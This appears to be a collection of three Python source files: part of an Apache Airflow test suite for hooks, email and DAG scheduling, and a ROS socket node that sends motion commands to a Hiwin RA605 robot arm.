'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
HiwinRA605_socket_ros_test_20190625190139.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them to the control-side computer over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
    def __init__(self, value):
        self.value = value
        self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        return  # end the generator with a bare return; raising StopIteration here fails on Python 3.7+
    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args: # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
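# Usage sketch (added for clarity; not called by the code below): the generator above
# yields self.match exactly once, so `for case in switch(value)` binds `case` to match()
# and the fall flag then mimics C-style fall-through; a bare case() acts as the default branch.
def example_switch_usage(action):
    for case in switch(action):
        if case(Taskcmd.Action_Type.PtoP):
            return 'point-to-point move'
        if case(Taskcmd.Action_Type.Line):
            return 'linear move'
        if case():  # default
            return 'unhandled action'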
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------ server side -------
def point_data(req): ## receive the pose data sent by the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
point_data_flag = True
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive the arm-mode data sent by the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive the speed-mode data sent by the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive the gripper action data sent by the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
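##----------- strategy-side usage sketch (added for illustration) ----------
# A minimal, hypothetical example of how the strategy side might call the
# 'arm_pos' service registered above. The request field names mirror what
# point_data() reads (x, y, z, pitch, roll, yaw); check the actual
# ROS_Socket.srv definition before relying on this sketch.
def example_send_point(x, y, z, pitch, roll, yaw):
    rospy.wait_for_service('arm_pos')
    send_point = rospy.ServiceProxy('arm_pos', arm_data)
    return send_point(x=x, y=y, z=z, pitch=pitch, roll=roll, yaw=yaw)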
##------------ server side end -------
##---------- socket packet transmission ----------##
##-----------socket client--------
def socket_client():
    global Arm_feedback, data
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.0.1', 8080)) # iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080)) # iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(s.recv(1024))
    while True:
        data = socket_command()
        socket_cmd.action = 5 ## switch back to the initial mode state
        s.send(data.encode('utf-8')) # the command is a str, so encode it before sending over the socket
        feedback_str = s.recv(1024)
        # the arm side reports its current state
        if str(feedback_str[2]) == '70': # 'F': the arm is Ready and can accept the next motion command
            Arm_feedback = 0
            socket_client_arm_state(Arm_feedback)
            #print("isbusy false")
        if str(feedback_str[2]) == '84': # 'T': the arm is busy and cannot run the next motion command
            Arm_feedback = 1
            socket_client_arm_state(Arm_feedback)
            #print("isbusy true")
        if str(feedback_str[2]) == '54': # '6': the strategy has finished
            Arm_feedback = 6
            socket_client_arm_state(Arm_feedback)
            print("shutdown")
        ##--------------- socket arm-command transmission end -----------------
        if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
            rospy.on_shutdown(myhook)
            break
    s.close()
def socket_command():
while(point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True):
        ##--------------- transmit the arm command over the socket -----------------
        #------- select the mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #------- set the arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #------- set the arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #------- set the arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
return(data)
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## switch to the initial mode state
    t = threading.Thread(target=thread_test)
    t.start() # start the worker thread
    socket_server()
    t.join()
# Ctrl+K Ctrl+C: add line comment
# Ctrl+K Ctrl+U: remove line comment
# Ctrl+] / Ctrl+[: indent / outdent line
|
test_core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import pickle # type: ignore
import signal
import unittest
from datetime import timedelta
from time import sleep
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, exceptions, settings, utils
from airflow.configuration import (
DEFAULT_CONFIG, AirflowConfigException, conf, parameterized_config, run_command,
)
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.jobs.scheduler_job import DagFileProcessor
from airflow.models import Connection, DagBag, DagRun, TaskFail, TaskInstance, Variable
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
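# Hedged sketch (added; not exercised by TestCore below): template_fields marks the
# attributes that Airflow renders with Jinja before execute() runs, so the '{{ ds }}'
# value below would become the run's date string at render time. The dag id and task id
# here are illustrative only.
def example_operator_subclass_templating():
    with DAG('operator_subclass_template_demo', start_date=DEFAULT_DATE) as demo_dag:
        task = OperatorSubclass(task_id='templated_task',
                                some_templated_field='{{ ds }}')
    return demo_dag, task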
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = dag_file_processor.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = DagFileProcessor(dag_ids=[], log=mock.MagicMock()).create_dag_run(dag)
dag_run2 = DagFileProcessor(dag_ids=[], log=mock.MagicMock()).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
# Create and schedule the dag runs
dag_runs = []
for _ in range(runs):
dag_runs.append(dag_file_processor.create_dag_run(dag))
additional_dag_run = dag_file_processor.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_file_processor = DagFileProcessor(dag_ids=[], log=mock.MagicMock())
dag_runs = []
for _ in range(runs):
dag_run = dag_file_processor.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = dag_file_processor.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
